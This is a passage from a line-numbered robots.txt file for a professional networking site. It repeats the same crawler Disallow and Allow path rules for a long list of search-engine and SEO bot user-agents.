747 | Disallow: /profile/ 748 | Disallow: /psettings/ 749 | Disallow: /reconnect* 750 | Disallow: /redirect* 751 | Disallow: /redir* 752 | Disallow: /requestList* 753 | Disallow: /search* 754 | Disallow: /secure/ 755 | Disallow: /settings/ 756 | Disallow: /shareArticle* 757 | Disallow: /signature* 758 | Disallow: /slink* 759 | Disallow: /svpRecommendations* 760 | Disallow: /uas/oauth/* 761 | Disallow: /using* 762 | Disallow: /help/*/ask 763 | Disallow: /help/*/ask/* 764 | Allow: /help/ 765 | Allow: /psettings/guest-controls* 766 | Allow: /psettings/guest-email-unsubscribe* 767 | Allow: /psettings/sms-unsubscribe* 768 | Allow: /psettings/guest-controls/retargeting-opt-out* 769 | 770 | User-agent: Googlebot-Mobile 771 | Disallow: /addContacts* 772 | Disallow: /addressBookExport* 773 | Disallow: /analytics/ 774 | Disallow: /answers* 775 | Disallow: /cap/ 776 | Disallow: /companyDir* 777 | Disallow: /connections* 778 | Disallow: /csp/ 779 | Disallow: /edurec* 780 | Disallow: /endorsements 781 | Disallow: /find/ 782 | Disallow: /groupAnswers* 783 | Disallow: /groupSharingMsg* 784 | Disallow: /inviteFromProfile* 785 | Disallow: /inviteMany* 786 | Disallow: /jobs?runSearch* 787 | Disallow: /jsearch* 788 | Disallow: /lite/ 789 | Disallow: /mbox* 790 | Disallow: /memberInvite* 791 | Disallow: /msgToConns* 792 | Disallow: /myprofile* 793 | Disallow: /network 794 | Disallow: /newsArticle* 795 | Disallow: /news?viewArticle* 796 | Disallow: /nus-trk* 797 | Disallow: /osview/ 798 | Disallow: /otherContacts 799 | Disallow: /people/iweReconnectAction 800 | Disallow: /ppl/ 801 | Disallow: /profile/ 802 | Disallow: /psettings/ 803 | Disallow: /reconnect* 804 | Disallow: /redirect* 805 | Disallow: /redir* 806 | Disallow: /requestList* 807 | Disallow: /search* 808 | Disallow: /secure/ 809 | Disallow: /settings/ 810 | Disallow: /shareArticle* 811 | Disallow: /signature* 812 | Disallow: /slink* 813 | Disallow: /svpRecommendations* 814 | Disallow: /uas/oauth/* 815 | Disallow: /using* 816 | Disallow: /help/*/ask 817 | Disallow: /help/*/ask/* 818 | Allow: /help/ 819 | Allow: /psettings/guest-controls* 820 | Allow: /psettings/guest-email-unsubscribe* 821 | Allow: /psettings/sms-unsubscribe* 822 | Allow: /psettings/guest-controls/retargeting-opt-out* 823 | 824 | User-agent: Mediapartners-Google 825 | Disallow: /addContacts* 826 | Disallow: /addressBookExport* 827 | Disallow: /analytics/ 828 | Disallow: /answers* 829 | Disallow: /cap/ 830 | Disallow: /companyDir* 831 | Disallow: /connections* 832 | Disallow: /csp/ 833 | Disallow: /edurec* 834 | Disallow: /endorsements 835 | Disallow: /find/ 836 | Disallow: /fetch/ 837 | Disallow: /groupAnswers* 838 | Disallow: /groupSharingMsg* 839 | Disallow: /inviteFromProfile* 840 | Disallow: /inviteMany* 841 | Disallow: /jobs?runSearch* 842 | Disallow: /jsearch* 843 | Disallow: /lite/ 844 | Disallow: /mbox* 845 | Disallow: /memberInvite* 846 | Disallow: /msgToConns* 847 | Disallow: /myprofile* 848 | Disallow: /network 849 | Disallow: /newsArticle* 850 | Disallow: /news?viewArticle* 851 | Disallow: /nus-trk* 852 | Disallow: /osview/ 853 | Disallow: /otherContacts 854 | Disallow: /people/iweReconnectAction 855 | Disallow: /ppl/ 856 | Disallow: /profile/ 857 | Disallow: /psettings/ 858 | Disallow: /reconnect* 859 | Disallow: /redirect* 860 | Disallow: /redir* 861 | Disallow: /requestList* 862 | Disallow: /search* 863 | Disallow: /secure/ 864 | Disallow: /settings/ 865 | Disallow: /shareArticle* 866 | Disallow: /signature* 867 | Disallow: /slink* 868 | Disallow: /svpRecommendations* 869 | Disallow: /uas/oauth/* 870 | Disallow: /using* 871 | Disallow: /help/*/ask 872 | Disallow: /help/*/ask/* 873 | Allow: /help/ 874 | Allow: /psettings/guest-controls* 875 | Allow: /psettings/guest-email-unsubscribe* 876 | Allow: /psettings/sms-unsubscribe* 877 | Allow: /psettings/guest-controls/retargeting-opt-out* 878 | 879 | User-agent: AdsBot-Google 880 | Disallow: /addContacts* 881 | Disallow: /addressBookExport* 882 | Disallow: /analytics/ 883 | Disallow: /answers* 884 | Disallow: /cap/ 885 | Disallow: /companyDir* 886 | Disallow: /connections* 887 | Disallow: /csp/ 888 | Disallow: /edurec* 889 | Disallow: /endorsements 890 | Disallow: /find/ 891 | Disallow: /groupAnswers* 892 | Disallow: /groupSharingMsg* 893 | Disallow: /inviteFromProfile* 894 | Disallow: /inviteMany* 895 | Disallow: /jobs?runSearch* 896 | Disallow: /jsearch* 897 | Disallow: /lite/ 898 | Disallow: /mbox* 899 | Disallow: /memberInvite* 900 | Disallow: /msgToConns* 901 | Disallow: /myprofile* 902 | Disallow: /network 903 | Disallow: /newsArticle* 904 | Disallow: /news?viewArticle* 905 | Disallow: /nus-trk* 906 | Disallow: /osview/ 907 | Disallow: /otherContacts 908 | Disallow: /people/iweReconnectAction 909 | Disallow: /ppl/ 910 | Disallow: /profile/ 911 | Disallow: /psettings/ 912 | Disallow: /reconnect* 913 | Disallow: /redirect* 914 | Disallow: /redir* 915 | Disallow: /requestList* 916 | Disallow: /search* 917 | Disallow: /secure/ 918 | Disallow: /settings/ 919 | Disallow: /shareArticle* 920 | Disallow: /signature* 921 | Disallow: /slink* 922 | Disallow: /svpRecommendations* 923 | Disallow: /uas/oauth/* 924 | Disallow: /using* 925 | Disallow: /help/*/ask 926 | Disallow: /help/*/ask/* 927 | Allow: /help/ 928 | Allow: /psettings/guest-controls* 929 | Allow: /psettings/guest-email-unsubscribe* 930 | Allow: /psettings/sms-unsubscribe* 931 | Allow: /psettings/guest-controls/retargeting-opt-out* 932 | 933 | User-agent: DuckDuckBot 934 | Disallow: /addContacts* 935 | Disallow: /addressBookExport* 936 | Disallow: /analytics/ 937 | Disallow: /answers* 938 | Disallow: /cap/ 939 | Disallow: /companyDir* 940 | Disallow: /connections* 941 | Disallow: /csp/ 942 | Disallow: /edurec* 943 | Disallow: /endorsements 944 | Disallow: /find/ 945 | Disallow: /groupAnswers* 946 | Disallow: /groupSharingMsg* 947 | Disallow: /inviteFromProfile* 948 | Disallow: /inviteMany* 949 | Disallow: /jobs?runSearch* 950 | Disallow: /jsearch* 951 | Disallow: /lite/ 952 | Disallow: /mbox* 953 | Disallow: /memberInvite* 954 | Disallow: /msgToConns* 955 | Disallow: /myprofile* 956 | Disallow: /network 957 | Disallow: /newsArticle* 958 | Disallow: /news?viewArticle* 959 | Disallow: /nus-trk* 960 | Disallow: /osview/ 961 | Disallow: /otherContacts 962 | Disallow: /people/iweReconnectAction 963 | Disallow: /ppl/ 964 | Disallow: /profile/ 965 | Disallow: /psettings/ 966 | Disallow: /reconnect* 967 | Disallow: /redirect* 968 | Disallow: /redir* 969 | Disallow: /requestList* 970 | Disallow: /search* 971 | Disallow: /secure/ 972 | Disallow: /settings/ 973 | Disallow: /shareArticle* 974 | Disallow: /signature* 975 | Disallow: /slink* 976 | Disallow: /svpRecommendations* 977 | Disallow: /uas/oauth/* 978 | Disallow: /using* 979 | Disallow: /help/*/ask 980 | Disallow: /help/*/ask/* 981 | Allow: /help/ 982 | Allow: /psettings/guest-controls* 983 | Allow: /psettings/guest-email-unsubscribe* 984 | Allow: /psettings/sms-unsubscribe* 985 | Allow: /psettings/guest-controls/retargeting-opt-out* 986 | 987 | User-agent: daumoa 988 | Disallow: /addContacts* 989 | Disallow: /addressBookExport* 990 | Disallow: /analytics/ 991 | Disallow: /answers* 992 | Disallow: /cap/ 993 | Disallow: /companyDir* 994 | Disallow: /connections* 995 | Disallow: /csp/ 996 | Disallow: /edurec* 997 | Disallow: /endorsements 998 | Disallow: /find/ 999 | Disallow: /groupAnswers* 1000 | Disallow: /groupSharingMsg* 1001 | Disallow: /inviteFromProfile* 1002 | Disallow: /inviteMany* 1003 | Disallow: /jobs?runSearch* 1004 | Disallow: /jsearch* 1005 | Disallow: /lite/ 1006 | Disallow: /mbox* 1007 | Disallow: /memberInvite* 1008 | Disallow: /msgToConns* 1009 | Disallow: /myprofile* 1010 | Disallow: /network 1011 | Disallow: /newsArticle* 1012 | Disallow: /news?viewArticle* 1013 | Disallow: /nus-trk* 1014 | Disallow: /osview/ 1015 | Disallow: /otherContacts 1016 | Disallow: /people/iweReconnectAction 1017 | Disallow: /ppl/ 1018 | Disallow: /profile/ 1019 | Disallow: /psettings/ 1020 | Disallow: /reconnect* 1021 | Disallow: /redirect* 1022 | Disallow: /redir* 1023 | Disallow: /requestList* 1024 | Disallow: /search* 1025 | Disallow: /secure/ 1026 | Disallow: /settings/ 1027 | Disallow: /shareArticle* 1028 | Disallow: /signature* 1029 | Disallow: /slink* 1030 | Disallow: /svpRecommendations* 1031 | Disallow: /uas/oauth/* 1032 | Disallow: /using* 1033 | Disallow: /help/*/ask 1034 | Disallow: /help/*/ask/* 1035 | Allow: /help/ 1036 | Allow: /psettings/guest-controls* 1037 | Allow: /psettings/guest-email-unsubscribe* 1038 | Allow: /psettings/sms-unsubscribe* 1039 | Allow: /psettings/guest-controls/retargeting-opt-out* 1040 | 1041 | User-agent: OrangeBot 1042 | Disallow: /addContacts* 1043 | Disallow: /addressBookExport* 1044 | Disallow: /analytics/ 1045 | Disallow: /answers* 1046 | Disallow: /cap/ 1047 | Disallow: /companyDir* 1048 | Disallow: /connections* 1049 | Disallow: /csp/ 1050 | Disallow: /edurec* 1051 | Disallow: /endorsements 1052 | Disallow: /find/ 1053 | Disallow: /groupAnswers* 1054 | Disallow: /groupSharingMsg* 1055 | Disallow: /inviteFromProfile* 1056 | Disallow: /inviteMany* 1057 | Disallow: /jobs?runSearch* 1058 | Disallow: /jsearch* 1059 | Disallow: /lite/ 1060 | Disallow: /mbox* 1061 | Disallow: /memberInvite* 1062 | Disallow: /msgToConns* 1063 | Disallow: /myprofile* 1064 | Disallow: /network 1065 | Disallow: /newsArticle* 1066 | Disallow: /news?viewArticle* 1067 | Disallow: /nus-trk* 1068 | Disallow: /osview/ 1069 | Disallow: /otherContacts 1070 | Disallow: /people/iweReconnectAction 1071 | Disallow: /ppl/ 1072 | Disallow: /profile/ 1073 | Disallow: /psettings/ 1074 | Disallow: /reconnect* 1075 | Disallow: /redirect* 1076 | Disallow: /redir* 1077 | Disallow: /requestList* 1078 | Disallow: /search* 1079 | Disallow: /secure/ 1080 | Disallow: /settings/ 1081 | Disallow: /shareArticle* 1082 | Disallow: /signature* 1083 | Disallow: /slink* 1084 | Disallow: /svpRecommendations* 1085 | Disallow: /uas/oauth/* 1086 | Disallow: /using* 1087 | Disallow: /help/*/ask 1088 | Disallow: /help/*/ask/* 1089 | Allow: /help/ 1090 | Allow: /psettings/guest-controls* 1091 | Allow: /psettings/guest-email-unsubscribe* 1092 | Allow: /psettings/sms-unsubscribe* 1093 | Allow: /psettings/guest-controls/retargeting-opt-out* 1094 | 1095 | User-agent: OrangeBot-Collector 1096 | Disallow: /addContacts* 1097 | Disallow: /addressBookExport* 1098 | Disallow: /analytics/ 1099 | Disallow: /answers* 1100 | Disallow: /cap/ 1101 | Disallow: /companyDir* 1102 | Disallow: /connections* 1103 | Disallow: /csp/ 1104 | Disallow: /edurec* 1105 | Disallow: /endorsements 1106 | Disallow: /find/ 1107 | Disallow: /groupAnswers* 1108 | Disallow: /groupSharingMsg* 1109 | Disallow: /inviteFromProfile* 1110 | Disallow: /inviteMany* 1111 | Disallow: /jobs?runSearch* 1112 | Disallow: /jsearch* 1113 | Disallow: /lite/ 1114 | Disallow: /mbox* 1115 | Disallow: /memberInvite* 1116 | Disallow: /msgToConns* 1117 | Disallow: /myprofile* 1118 | Disallow: /network 1119 | Disallow: /newsArticle* 1120 | Disallow: /news?viewArticle* 1121 | Disallow: /nus-trk* 1122 | Disallow: /osview/ 1123 | Disallow: /otherContacts 1124 | Disallow: /people/iweReconnectAction 1125 | Disallow: /ppl/ 1126 | Disallow: /profile/ 1127 | Disallow: /psettings/ 1128 | Disallow: /reconnect* 1129 | Disallow: /redirect* 1130 | Disallow: /redir* 1131 | Disallow: /requestList* 1132 | Disallow: /search* 1133 | Disallow: /secure/ 1134 | Disallow: /settings/ 1135 | Disallow: /shareArticle* 1136 | Disallow: /signature* 1137 | Disallow: /slink* 1138 | Disallow: /svpRecommendations* 1139 | Disallow: /uas/oauth/* 1140 | Disallow: /using* 1141 | Disallow: /help/*/ask 1142 | Disallow: /help/*/ask/* 1143 | Allow: /help/ 1144 | Allow: /psettings/guest-controls* 1145 | Allow: /psettings/guest-email-unsubscribe* 1146 | Allow: /psettings/sms-unsubscribe* 1147 | Allow: /psettings/guest-controls/retargeting-opt-out* 1148 | 1149 | User-agent: StackRambler 1150 | Disallow: /addContacts* 1151 | Disallow: /addressBookExport* 1152 | Disallow: /analytics/ 1153 | Disallow: /answers* 1154 | Disallow: /cap/ 1155 | Disallow: /companyDir* 1156 | Disallow: /connections* 1157 | Disallow: /csp/ 1158 | Disallow: /edurec* 1159 | Disallow: /endorsements 1160 | Disallow: /find/ 1161 | Disallow: /groupAnswers* 1162 | Disallow: /groupSharingMsg* 1163 | Disallow: /inviteFromProfile* 1164 | Disallow: /inviteMany* 1165 | Disallow: /jobs?runSearch* 1166 | Disallow: /jsearch* 1167 | Disallow: /lite/ 1168 | Disallow: /mbox* 1169 | Disallow: /memberInvite* 1170 | Disallow: /msgToConns* 1171 | Disallow: /myprofile* 1172 | Disallow: /network 1173 | Disallow: /newsArticle* 1174 | Disallow: /news?viewArticle* 1175 | Disallow: /nus-trk* 1176 | Disallow: /osview/ 1177 | Disallow: /otherContacts 1178 | Disallow: /people/iweReconnectAction 1179 | Disallow: /ppl/ 1180 | Disallow: /profile/ 1181 | Disallow: /psettings/ 1182 | Disallow: /reconnect* 1183 | Disallow: /redirect* 1184 | Disallow: /redir* 1185 | Disallow: /requestList* 1186 | Disallow: /search* 1187 | Disallow: /secure/ 1188 | Disallow: /settings/ 1189 | Disallow: /shareArticle* 1190 | Disallow: /signature* 1191 | Disallow: /slink* 1192 | Disallow: /svpRecommendations* 1193 | Disallow: /uas/oauth/* 1194 | Disallow: /using* 1195 | Disallow: /help/*/ask 1196 | Disallow: /help/*/ask/* 1197 | Allow: /help/ 1198 | Allow: /psettings/guest-controls* 1199 | Allow: /psettings/guest-email-unsubscribe* 1200 | Allow: /psettings/sms-unsubscribe* 1201 | Allow: /psettings/guest-controls/retargeting-opt-out* 1202 | 1203 | User-agent: Twitterbot/1.0 1204 | Disallow: /addContacts* 1205 | Disallow: /addressBookExport* 1206 | Disallow: /analytics/ 1207 | Disallow: /answers* 1208 | Disallow: /cap/ 1209 | Disallow: /companyDir* 1210 | Disallow: /connections* 1211 | Disallow: /csp/ 1212 | Disallow: /edurec* 1213 | Disallow: /endorsements 1214 | Disallow: /find/ 1215 | Disallow: /groupAnswers* 1216 | Disallow: /groupSharingMsg* 1217 | Disallow: /inviteFromProfile* 1218 | Disallow: /inviteMany* 1219 | Disallow: /jobs?runSearch* 1220 | Disallow: /jsearch* 1221 | Disallow: /lite/ 1222 | Disallow: /mbox* 1223 | Disallow: /memberInvite* 1224 | Disallow: /msgToConns* 1225 | Disallow: /myprofile* 1226 | Disallow: /network 1227 | Disallow: /newsArticle* 1228 | Disallow: /news?viewArticle* 1229 | Disallow: /nus-trk* 1230 | Disallow: /osview/ 1231 | Disallow: /otherContacts 1232 | Disallow: /people/iweReconnectAction 1233 | Disallow: /ppl/ 1234 | Disallow: /profile/ 1235 | Disallow: /psettings/ 1236 | Disallow: /reconnect* 1237 | Disallow: /redirect* 1238 | Disallow: /redir* 1239 | Disallow: /requestList* 1240 | Disallow: /search* 1241 | Disallow: /secure/ 1242 | Disallow: /settings/ 1243 | Disallow: /shareArticle* 1244 | Disallow: /signature* 1245 | Disallow: /svpRecommendations* 1246 | Disallow: /uas/oauth/* 1247 | Disallow: /using* 1248 | Disallow: /help/*/ask 1249 | Disallow: /help/*/ask/* 1250 | Allow: /help/ 1251 | Allow: /psettings/guest-controls* 1252 | Allow: /psettings/guest-email-unsubscribe* 1253 | Allow: /psettings/sms-unsubscribe* 1254 | Allow: /psettings/guest-controls/retargeting-opt-out* 1255 | 1256 | User-agent: Mail.RU_Bot 1257 | Disallow: /addContacts* 1258 | Disallow: /addressBookExport* 1259 | Disallow: /analytics/ 1260 | Disallow: /answers* 1261 | Disallow: /cap/ 1262 | Disallow: /companyDir* 1263 | Disallow: /connections* 1264 | Disallow: /csp/ 1265 | Disallow: /edurec* 1266 | Disallow: /endorsements 1267 | Disallow: /find/ 1268 | Disallow: /groupAnswers* 1269 | Disallow: /groupSharingMsg* 1270 | Disallow: /inviteFromProfile* 1271 | Disallow: /inviteMany* 1272 | Disallow: /jobs?runSearch* 1273 | Disallow: /jsearch* 1274 | Disallow: /lite/ 1275 | Disallow: /mbox* 1276 | Disallow: /memberInvite* 1277 | Disallow: /msgToConns* 1278 | Disallow: /myprofile* 1279 | Disallow: /network 1280 | Disallow: /newsArticle* 1281 | Disallow: /news?viewArticle* 1282 | Disallow: /nus-trk* 1283 | Disallow: /osview/ 1284 | Disallow: /otherContacts 1285 | Disallow: /people/iweReconnectAction 1286 | Disallow: /ppl/ 1287 | Disallow: /profile/ 1288 | Disallow: /psettings/ 1289 | Disallow: /reconnect* 1290 | Disallow: /redirect* 1291 | Disallow: /redir* 1292 | Disallow: /requestList* 1293 | Disallow: /search* 1294 | Disallow: /secure/ 1295 | Disallow: /settings/ 1296 | Disallow: /shareArticle* 1297 | Disallow: /signature* 1298 | Disallow: /slink* 1299 | Disallow: /svpRecommendations* 1300 | Disallow: /uas/oauth/* 1301 | Disallow: /using* 1302 | Disallow: /help/*/ask 1303 | Disallow: /help/*/ask/* 1304 | Allow: /help/ 1305 | Allow: /psettings/guest-controls* 1306 | Allow: /psettings/guest-email-unsubscribe* 1307 | Allow: /psettings/sms-unsubscribe* 1308 | Allow: /psettings/guest-controls/retargeting-opt-out* 1309 | 1310 | User-agent: naverbot 1311 | Disallow: /addContacts* 1312 | Disallow: /addressBookExport* 1313 | Disallow: /analytics/ 1314 | Disallow: /answers* 1315 | Disallow: /cap/ 1316 | Disallow: /companyDir* 1317 | Disallow: /connections* 1318 | Disallow: /csp/ 1319 | Disallow: /edurec* 1320 | Disallow: /endorsements 1321 | Disallow: /find/ 1322 | Disallow: /groupAnswers* 1323 | Disallow: /groupSharingMsg* 1324 | Disallow: /inviteFromProfile* 1325 | Disallow: /inviteMany* 1326 | Disallow: /jobs?runSearch* 1327 | Disallow: /jsearch* 1328 | Disallow: /lite/ 1329 | Disallow: /mbox* 1330 | Disallow: /memberInvite* 1331 | Disallow: /msgToConns* 1332 | Disallow: /myprofile* 1333 | Disallow: /network 1334 | Disallow: /newsArticle* 1335 | Disallow: /news?viewArticle* 1336 | Disallow: /nus-trk* 1337 | Disallow: /osview/ 1338 | Disallow: /otherContacts 1339 | Disallow: /people/iweReconnectAction 1340 | Disallow: /ppl/ 1341 | Disallow: /profile/ 1342 | Disallow: /psettings/ 1343 | Disallow: /reconnect* 1344 | Disallow: /redirect* 1345 | Disallow: /redir* 1346 | Disallow: /requestList* 1347 | Disallow: /search* 1348 | Disallow: /secure/ 1349 | Disallow: /settings/ 1350 | Disallow: /shareArticle* 1351 | Disallow: /signature* 1352 | Disallow: /slink* 1353 | Disallow: /svpRecommendations* 1354 | Disallow: /uas/oauth/* 1355 | Disallow: /using* 1356 | Disallow: /help/*/ask 1357 | Disallow: /help/*/ask/* 1358 | Allow: /help/ 1359 | Allow: /psettings/guest-controls* 1360 | Allow: /psettings/guest-email-unsubscribe* 1361 | Allow: /psettings/sms-unsubscribe* 1362 | Allow: /psettings/guest-controls/retargeting-opt-out* 1363 | 1364 | User-agent: vebidoobot 1365 | Disallow: /addContacts* 1366 | Disallow: /addressBookExport* 1367 | Disallow: /analytics/ 1368 | Disallow: /answers* 1369 | Disallow: /cap/ 1370 | Disallow: /companyDir* 1371 | Disallow: /connections* 1372 | Disallow: /csp/ 1373 | Disallow: /edurec* 1374 | Disallow: /endorsements 1375 | Disallow: /find/ 1376 | Disallow: /groupAnswers* 1377 | Disallow: /groupSharingMsg* 1378 | Disallow: /inviteFromProfile* 1379 | Disallow: /inviteMany* 1380 | Disallow: /jobs?runSearch* 1381 | Disallow: /jsearch* 1382 | Disallow: /lite/ 1383 | Disallow: /mbox* 1384 | Disallow: /memberInvite* 1385 | Disallow: /msgToConns* 1386 | Disallow: /myprofile* 1387 | Disallow: /network 1388 | Disallow: /newsArticle* 1389 | Disallow: /news?viewArticle* 1390 | Disallow: /nus-trk* 1391 | Disallow: /osview/ 1392 | Disallow: /otherContacts 1393 | Disallow: /people/iweReconnectAction 1394 | Disallow: /ppl/ 1395 | Disallow: /profile/ 1396 | Disallow: /psettings/ 1397 | Disallow: /reconnect* 1398 | Disallow: /redirect* 1399 | Disallow: /redir* 1400 | Disallow: /requestList* 1401 | Disallow: /search* 1402 | Disallow: /secure/ 1403 | Disallow: /settings/ 1404 | Disallow: /shareArticle* 1405 | Disallow: /signature* 1406 | Disallow: /slink* 1407 | Disallow: /svpRecommendations* 1408 | Disallow: /uas/oauth/* 1409 | Disallow: /using* 1410 | Allow: /psettings/guest-controls* 1411 | Allow: /psettings/guest-email-unsubscribe* 1412 | Allow: /psettings/sms-unsubscribe* 1413 | Allow: /psettings/guest-controls/retargeting-opt-out* 1414 | 1415 | User-agent: MJ12bot 1416 | Disallow: /addContacts* 1417 | Disallow: /addressBookExport* 1418 | Disallow: /analytics/ 1419 | Disallow: /answers* 1420 | Disallow: /cap/ 1421 | Disallow: /companyDir* 1422 | Disallow: /connections* 1423 | Disallow: /csp/ 1424 | Disallow: /edurec* 1425 | Disallow: /endorsements 1426 | Disallow: /find/ 1427 | Disallow: /groupAnswers* 1428 | Disallow: /groupSharingMsg* 1429 | Disallow: /inviteFromProfile* 1430 | Disallow: /inviteMany* 1431 | Disallow: /jobs?runSearch* 1432 | Disallow: /jsearch* 1433 | Disallow: /lite/ 1434 | Disallow: /mbox* 1435 | Disallow: /memberInvite* 1436 | Disallow: /msgToConns* 1437 | Disallow: /myprofile* 1438 | Disallow: /network 1439 | Disallow: /newsArticle* 1440 | Disallow: /news?viewArticle* 1441 | Disallow: /nus-trk* 1442 | Disallow: /osview/ 1443 | Disallow: /otherContacts 1444 | Disallow: /people/iweReconnectAction 1445 | Disallow: /ppl/ 1446 | Disallow: /profile/ 1447 | Disallow: /psettings/ 1448 | Disallow: /reconnect* 1449 | Disallow: /redirect* 1450 | Disallow: /redir* 1451 | Disallow: /requestList* 1452 | Disallow: /search* 1453 | Disallow: /secure/ 1454 | Disallow: /settings/ 1455 | Disallow: /shareArticle* 1456 | Disallow: /signature* 1457 | Disallow: /slink* 1458 | Disallow: /svpRecommendations* 1459 | Disallow: /uas/oauth/* 1460 | Disallow: /using* 1461 | Allow: /psettings/guest-controls* 1462 | Allow: /psettings/guest-email-unsubscribe* 1463 | Allow: /psettings/sms-unsubscribe* 1464 | Allow: /psettings/guest-controls/retargeting-opt-out* 1465 | 1466 | User-agent: 360Spider 1467 | Disallow: /addContacts* 1468 | Disallow: /addressBookExport* 1469 | Disallow: /analytics/ 1470 | Disallow: /answers* 1471 | Disallow: /cap/ 1472 | Disallow: /companyDir* 1473 | Disallow: /connections* 1474 | Disallow: /csp/ 1475 | Disallow: /edurec* 1476 | Disallow: /endorsements 1477 | Disallow: /find/ 1478 | Disallow: /groupAnswers* 1479 | Disallow: /groupSharingMsg* 1480 | Disallow: /inviteFromProfile* 1481 | Disallow: /inviteMany* 1482 | Disallow: /jobs?runSearch* 1483 | Disallow: /jsearch* 1484 | Disallow: /lite/ 1485 | Disallow: /mbox* 1486 | Disallow: /memberInvite* 1487 | Disallow: /msgToConns* 1488 | Disallow: /myprofile* 1489 | Disallow: /network 1490 | Disallow: /newsArticle* 1491 | Disallow: /news?viewArticle* 1492 | Disallow: /nus-trk* 1493 | Disallow: /osview/ 1494 | Disallow: /otherContacts 1495 | Disallow: /people/iweReconnectAction 1496 | Disallow: /ppl/ 1497 | Disallow: /profile/ 1498 | Disallow: /psettings/ 1499 | Disallow: /reconnect* 1500 | Disallow: /redirect* 1501 | Disallow: /redir* 1502 | Disallow: /requestList* 1503 | Disallow: /search* 1504 | Disallow: /secure/ 1505 | Disallow: /settings/ 1506 | Disallow: /shareArticle* 1507 | Disallow: /signature* 1508 | Disallow: /slink* 1509 | Disallow: /svpRecommendations* 1510 | Disallow: /uas/oauth/* 1511 | Disallow: /using* 1512 | Disallow: /help/*/ask 1513 | Disallow: /help/*/ask/* 1514 | Allow: /help/ 1515 | Allow: /psettings/guest-controls* 1516 | Allow: /psettings/guest-email-unsubscribe* 1517 | Allow: /psettings/sms-unsubscribe* 1518 | Allow: /psettings/guest-controls/retargeting-opt-out* 1519 | 1520 | User-agent: Sogou 1521 | Disallow: /addContacts* 1522 | Disallow: /addressBookExport* 1523 | Disallow: /analytics/ 1524 | Disallow: /answers* 1525 | Disallow: /cap/ 1526 | Disallow: /companyDir* 1527 | Disallow: /connections* 1528 | Disallow: /csp/ 1529 | Disallow: /edurec* 1530 | Disallow: /endorsements 1531 | Disallow: /find/ 1532 | Disallow: /groupAnswers* 1533 | Disallow: /groupSharingMsg* 1534 | Disallow: /inviteFromProfile* 1535 | Disallow: /inviteMany* 1536 | Disallow: /jobs?runSearch* 1537 | Disallow: /jsearch* 1538 | Disallow: /lite/ 1539 | Disallow: /mbox* 1540 | Disallow: /memberInvite* 1541 | Disallow: /msgToConns* 1542 | Disallow: /myprofile* 1543 | Disallow: /network 1544 | Disallow: /newsArticle* 1545 | Disallow: /news?viewArticle* 1546 | Disallow: /nus-trk* 1547 | Disallow: /osview/ 1548 | Disallow: /otherContacts 1549 | Disallow: /people/iweReconnectAction 1550 | Disallow: /ppl/ 1551 | Disallow: /profile/ 1552 | Disallow: /psettings/ 1553 | Disallow: /reconnect* 1554 | Disallow: /redirect* 1555 | Disallow: /redir* 1556 | Disallow: /requestList* 1557 | Disallow: /search* 1558 | Disallow: /secure/ 1559 | Disallow: /settings/ 1560 | Disallow: /shareArticle* 1561 | Disallow: /signature* 1562 | Disallow: /slink* 1563 | Disallow: /svpRecommendations* 1564 | Disallow: /uas/oauth/* 1565 | Disallow: /using* 1566 | Disallow: /help/*/ask 1567 | Disallow: /help/*/ask/* 1568 | Allow: /help/ 1569 | Allow: /psettings/guest-controls* 1570 | Allow: /psettings/guest-email-unsubscribe* 1571 | Allow: /psettings/sms-unsubscribe* 1572 | Allow: /psettings/guest-controls/retargeting-opt-out* 1573 | 1574 | User-agent: rogerbot 1575 | Disallow: /addContacts* 1576 | Disallow: /addressBookExport* 1577 | Disallow: /analytics/ 1578 | Disallow: /answers* 1579 | Disallow: /cap/ 1580 | Disallow: /companyDir* 1581 | Disallow: /connections* 1582 | Disallow: /csp/ 1583 | Disallow: /edurec* 1584 | Disallow: /endorsements 1585 | Disallow: /find/ 1586 | Disallow: /groupAnswers* 1587 | Disallow: /groupSharingMsg* 1588 | Disallow: /inviteFromProfile* 1589 | Disallow: /inviteMany* 1590 | Disallow: /jobs?runSearch* 1591 | Disallow: /jsearch* 1592 | Disallow: /lite/ 1593 | Disallow: /mbox* 1594 | Disallow: /memberInvite* 1595 | Disallow: /msgToConns* 1596 | Disallow: /myprofile* 1597 | Disallow: /network 1598 | Disallow: /newsArticle* 1599 | Disallow: /news?viewArticle* 1600 | Disallow: /nus-trk* 1601 | Disallow: /osview/ 1602 | Disallow: /otherContacts 1603 | Disallow: /people/iweReconnectAction 1604 | Disallow: /ppl/ 1605 | Disallow: /profile/ 1606 | Disallow: /psettings/ 1607 | Disallow: /reconnect* 1608 | Disallow: /redirect* 1609 | Disallow: /redir* 1610 | Disallow: /requestList* 1611 | Disallow: /search* 1612 | Disallow: /secure/ 1613 | Disallow: /settings/ 1614 | Disallow: /shareArticle* 1615 | Disallow: /signature* 1616 | Disallow: /slink* 1617 | Disallow: /svpRecommendations* 1618 | Disallow: /uas/oauth/* 1619 | Disallow: /using* 1620 | Disallow: /help/*/ask 1621 | Disallow: /help/*/ask/* 1622 | Allow: /help/ 1623 | Allow: /psettings/guest-controls* 1624 | Allow: /psettings/guest-email-unsubscribe* 1625 | Allow: /psettings/sms-unsubscribe* 1626 | Allow: /psettings/guest-controls/retargeting-opt-out* 1627 | 1628 | User-agent: deepcrawl 1629 | Disallow: /addContacts* 1630 | Disallow: /addressBookExport* 1631 | Disallow: /analytics/ 1632 | Disallow: /answers* 1633 | Disallow: /cap/ 1634 | Disallow: /companyDir* 1635 | Disallow: /connections* 1636 | Disallow: /csp/ 1637 | Disallow: /edurec* 1638 | Disallow: /endorsements 1639 | Disallow: /find/ 1640 | Disallow: /groupAnswers* 1641 | Disallow: /groupSharingMsg* 1642 | Disallow: /inviteFromProfile* 1643 | Disallow: /inviteMany* 1644 | Disallow: /jobs?runSearch* 1645 | Disallow: /jsearch* 1646 | Disallow: /lite/ 1647 | Disallow: /mbox* 1648 | Disallow: /memberInvite* 1649 | Disallow: /msgToConns* 1650 | Disallow: /myprofile* 1651 | Disallow: /network 1652 | Disallow: /newsArticle* 1653 | Disallow: /news?viewArticle* 1654 | Disallow: /nus-trk* 1655 | Disallow: /osview/ 1656 | Disallow: /otherContacts 1657 | Disallow: /people/iweReconnectAction 1658 | Disallow: /ppl/ 1659 | Disallow: /profile/ 1660 | Disallow: /psettings/ 1661 | Disallow: /reconnect* 1662 | Disallow: /redirect* 1663 | Disallow: /redir* 1664 | Disallow: /requestList* 1665 | Disallow: /search* 1666 | Disallow: /secure/ 1667 | Disallow: /settings/ 1668 | Disallow: /shareArticle* 1669 | Disallow: /signature* 1670 | 